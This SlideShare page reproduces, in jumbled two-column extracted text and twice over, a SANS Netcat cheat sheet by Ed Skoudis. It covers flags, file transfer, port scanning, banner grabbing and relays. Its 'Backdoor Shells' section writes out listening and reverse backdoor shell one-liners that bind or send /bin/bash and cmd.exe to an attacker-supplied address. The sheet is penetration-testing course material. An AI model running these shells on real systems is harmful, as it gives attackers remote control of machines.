Download as PDF, PPTX
![Netcat Relays on Windows Netcat Command Flags
Netcat
To start, enter a temporary directory where we will $ nc [options] [TargetIPaddr] [port(s)]
Cheat Sheet
create .bat files: By Ed Skoudis
C:> cd c:temp The [TargetIPaddr] is simply the other side’s IP
POCKET REFERENCE GUIDE
address or domain name. It is required in client mode
Listener-to-Client Relay: of course (because we have to tell the client where to http://www.sans.org
C:> echo nc [TargetIPaddr] [port] > connect), and is optional in listen mode.
relay.bat
C:> nc –l –p [LocalPort] –e relay.bat -l: Listen mode (default is client mode) Purpose
-L: Listen harder (supported only on Windows This cheat sheet provides various tips for
Create a relay that sends packets from the local port version of Netcat). This option makes Netcat a using Netcat on both Linux and Unix,
[LocalPort] to a Netcat Client connected to persistent listener which starts listening again specifically tailored to the SANS 504, 517,
[TargetIPaddr] on port [port] after a client disconnects and 560 courses. All syntax is designed for
-u: UDP mode (default is TCP) the original Netcat versions, released by
-p: Local port (In listen mode, this is port listened Hobbit and Weld Pond. The syntax here
Listener-to-Listener Relay: on. In client mode, this is source port for all can be adapted for other Netcats, including
C:> echo nc –l –p [LocalPort_2] > packets sent) ncat, gnu Netcat, and others.
relay.bat -e: Program to execute after connection occurs,
C:> nc –l –p [LocalPort_1] –e
connecting STDIN and STDOUT to the
relay.bat Fundamentals
program
-n: Don’t perform DNS lookups on names of
Create a relay that will send packets from any Fundamental Netcat Client:
machines on the other side
connection on [LocalPort_1] to any connection $ nc [TargetIPaddr] [port]
-z: Zero-I/O mode (Don’t send any data, just emit
on [LocalPort_2] a packet without payload)
Connect to an arbitrary port [port] at IP Address
-wN: Timeout for connects, waits for N seconds [TargetIPaddr]
after closure of STDIN. A Netcat client or
Client-to-Client Relay:
listener with this option will wait for N seconds
C:> echo nc [NextHopIPaddr] [port2] > Fundamental Netcat Listener:
relay.bat to make a connection. If the connection $ nc –l -p [LocalPort]
C:> nc [PreviousHopIPaddr] [port] –e doesn’t happen in that time, Netcat stops
relay.bat running.
Create a Netcat listener on arbitrary local port
-v: Be verbose, printing out messages on [LocalPort]
Create a relay that will send packets from the Standard Error, such as when a connection
connection to [PreviousHopIPaddr] on port occurs Both the client and listener take input from STDIN
[port] to a Netcat Client connected to -vv: Be very verbose, printing even more details and send data received from the network to STDOUT
on Standard Error
[NextHopIPaddr] on port [port2]](https://image.slidesharecdn.com/netcatcheatsheetv1-120627100427-phpapp02/75/Netcat-cheat-sheet_v1-1-2048.jpg)
![File Transfer TCP Banner Grabber Netcat Relays on Linux
Grab the banner of any TCP service running on an IP To start, create a FIFO (named pipe) called
Push a file from client to listener:
$ nc –l -p [LocalPort] > [outfile] Address from Linux: backpipe:
$ echo "" | nc –v –n –w1 [TargetIPaddr] $ cd /tmp
[start_port]-[end_port] $ mknod backpipe p
Listen on [LocalPort], store results in [outfile]
$ nc –w3 [TargetIPaddr] [port] < Attempt to connect to each port in a range from
[infile] [end_port] to [start_port] on IP Address Listener-to-Client Relay:
$ nc –l –p [LocalPort] 0<backpipe | nc
[TargetIPaddr] running verbosely (-v), not [TargetIPaddr] [port] | tee backpipe
Push [infile] to [TargetIPaddr] on [port] resolving names (-n), and waiting no more than 1
second for a connection to occur (-w1). Then send a Create a relay that sends packets from the local port
Pull file from listener back to client: blank string to the open port and print out any [LocalPort] to a Netcat client connected to
$ nc –l -p [LocalPort] < [infile] banner received in response
[TargetIPaddr] on port [port]
Listen on [LocalPort], prep to push [infile] Add –r to randomize destination ports within the
range Listener-to-Listener Relay:
$ nc –w3 [TargetIPaddr] [port] >
$ nc –l –p [LocalPort_1] 0<backpipe |
[outfile] Add –p [port] to specify a source port for the nc –l –p [LocalPort_2] | tee backpipe
scan
Connect to [TargetIPaddr] on [port] and
Backdoor Shells Create a relay that sends packets from any
retrieve [outfile] connection on [LocalPort_1] to any connection
Listening backdoor shell on Linux: on [LocalPort_2]
TCP Port Scanner $ nc –l –p [LocalPort] –e /bin/bash
Listening backdoor shell on Windows:
Port scan an IP Address: C:> nc –l –p [LocalPort] –e cmd.exe
$ nc –v –n –z –w1 [TargetIPaddr] Client-to-Client Relay:
[start_port]-[end_port] $ nc [PreviousHopIPaddr] [port]
Create a shell on local port [LocalPort] that can 0<backpipe | nc [NextHopIPaddr]
then be accessed using a fundamental Netcat client [port2] | tee backpipe
Attempt to connect to each port in a range from
[end_port] to [start_port] on IP Address
Reverse backdoor shell on Linux: Create a relay that sends packets from the
[TargetIPaddr] running verbosely (-v on Linux, - $ nc [YourIPaddr] [port] –e /bin/bash connection to [PreviousHopIPaddr] on port
vv on Windows), not resolving names (-n), without Reverse backdoor shell on Windows: [port] to a Netcat client connected to
sending any data (-z), and waiting no more than 1 C:> nc [YourIPaddr] [port] –e cmd.exe [NextHopIPaddr] on port [port2]
second for a connection to occur (-w1)
Create a reverse shell that will attempt to connect to
The randomize ports (-r) switch can be used to [YourIPaddr] on local port [port]. This shell
choose port numbers randomly in the range can then be captured using a fundamental nc listener](https://image.slidesharecdn.com/netcatcheatsheetv1-120627100427-phpapp02/75/Netcat-cheat-sheet_v1-2-2048.jpg)
Netcat cheat sheet_v1
- 1. Netcat Relays onWindows Netcat Command Flags Netcat To start, enter a temporary directory where we will $ nc [options] [TargetIPaddr] [port(s)] Cheat Sheet create .bat files: By Ed Skoudis C:> cd c:temp The [TargetIPaddr] is simply the other side’s IP POCKET REFERENCE GUIDE address or domain name. It is required in client mode Listener-to-Client Relay: of course (because we have to tell the client where to http://www.sans.org C:> echo nc [TargetIPaddr] [port] > connect), and is optional in listen mode. relay.bat C:> nc –l –p [LocalPort] –e relay.bat -l: Listen mode (default is client mode) Purpose -L: Listen harder (supported only on Windows This cheat sheet provides various tips for Create a relay that sends packets from the local port version of Netcat). This option makes Netcat a using Netcat on both Linux and Unix, [LocalPort] to a Netcat Client connected to persistent listener which starts listening again specifically tailored to the SANS 504, 517, [TargetIPaddr] on port [port] after a client disconnects and 560 courses. All syntax is designed for -u: UDP mode (default is TCP) the original Netcat versions, released by -p: Local port (In listen mode, this is port listened Hobbit and Weld Pond. The syntax here Listener-to-Listener Relay: on. In client mode, this is source port for all can be adapted for other Netcats, including C:> echo nc –l –p [LocalPort_2] > packets sent) ncat, gnu Netcat, and others. relay.bat -e: Program to execute after connection occurs, C:> nc –l –p [LocalPort_1] –e connecting STDIN and STDOUT to the relay.bat Fundamentals program -n: Don’t perform DNS lookups on names of Create a relay that will send packets from any Fundamental Netcat Client: machines on the other side connection on [LocalPort_1] to any connection $ nc [TargetIPaddr] [port] -z: Zero-I/O mode (Don’t send any data, just emit on [LocalPort_2] a packet without payload) Connect to an arbitrary port [port] at IP Address -wN: Timeout for connects, waits for N seconds [TargetIPaddr] after closure of STDIN. A Netcat client or Client-to-Client Relay: listener with this option will wait for N seconds C:> echo nc [NextHopIPaddr] [port2] > Fundamental Netcat Listener: relay.bat to make a connection. If the connection $ nc –l -p [LocalPort] C:> nc [PreviousHopIPaddr] [port] –e doesn’t happen in that time, Netcat stops relay.bat running. Create a Netcat listener on arbitrary local port -v: Be verbose, printing out messages on [LocalPort] Create a relay that will send packets from the Standard Error, such as when a connection connection to [PreviousHopIPaddr] on port occurs Both the client and listener take input from STDIN [port] to a Netcat Client connected to -vv: Be very verbose, printing even more details and send data received from the network to STDOUT on Standard Error [NextHopIPaddr] on port [port2]
- 2. File Transfer TCP Banner Grabber Netcat Relays on Linux Grab the banner of any TCP service running on an IP To start, create a FIFO (named pipe) called Push a file from client to listener: $ nc –l -p [LocalPort] > [outfile] Address from Linux: backpipe: $ echo "" | nc –v –n –w1 [TargetIPaddr] $ cd /tmp [start_port]-[end_port] $ mknod backpipe p Listen on [LocalPort], store results in [outfile] $ nc –w3 [TargetIPaddr] [port] < Attempt to connect to each port in a range from [infile] [end_port] to [start_port] on IP Address Listener-to-Client Relay: $ nc –l –p [LocalPort] 0<backpipe | nc [TargetIPaddr] running verbosely (-v), not [TargetIPaddr] [port] | tee backpipe Push [infile] to [TargetIPaddr] on [port] resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a Create a relay that sends packets from the local port Pull file from listener back to client: blank string to the open port and print out any [LocalPort] to a Netcat client connected to $ nc –l -p [LocalPort] < [infile] banner received in response [TargetIPaddr] on port [port] Listen on [LocalPort], prep to push [infile] Add –r to randomize destination ports within the range Listener-to-Listener Relay: $ nc –w3 [TargetIPaddr] [port] > $ nc –l –p [LocalPort_1] 0<backpipe | [outfile] Add –p [port] to specify a source port for the nc –l –p [LocalPort_2] | tee backpipe scan Connect to [TargetIPaddr] on [port] and Backdoor Shells Create a relay that sends packets from any retrieve [outfile] connection on [LocalPort_1] to any connection Listening backdoor shell on Linux: on [LocalPort_2] TCP Port Scanner $ nc –l –p [LocalPort] –e /bin/bash Listening backdoor shell on Windows: Port scan an IP Address: C:> nc –l –p [LocalPort] –e cmd.exe $ nc –v –n –z –w1 [TargetIPaddr] Client-to-Client Relay: [start_port]-[end_port] $ nc [PreviousHopIPaddr] [port] Create a shell on local port [LocalPort] that can 0<backpipe | nc [NextHopIPaddr] then be accessed using a fundamental Netcat client [port2] | tee backpipe Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address Reverse backdoor shell on Linux: Create a relay that sends packets from the [TargetIPaddr] running verbosely (-v on Linux, - $ nc [YourIPaddr] [port] –e /bin/bash connection to [PreviousHopIPaddr] on port vv on Windows), not resolving names (-n), without Reverse backdoor shell on Windows: [port] to a Netcat client connected to sending any data (-z), and waiting no more than 1 C:> nc [YourIPaddr] [port] –e cmd.exe [NextHopIPaddr] on port [port2] second for a connection to occur (-w1) Create a reverse shell that will attempt to connect to The randomize ports (-r) switch can be used to [YourIPaddr] on local port [port]. This shell choose port numbers randomly in the range can then be captured using a fundamental nc listener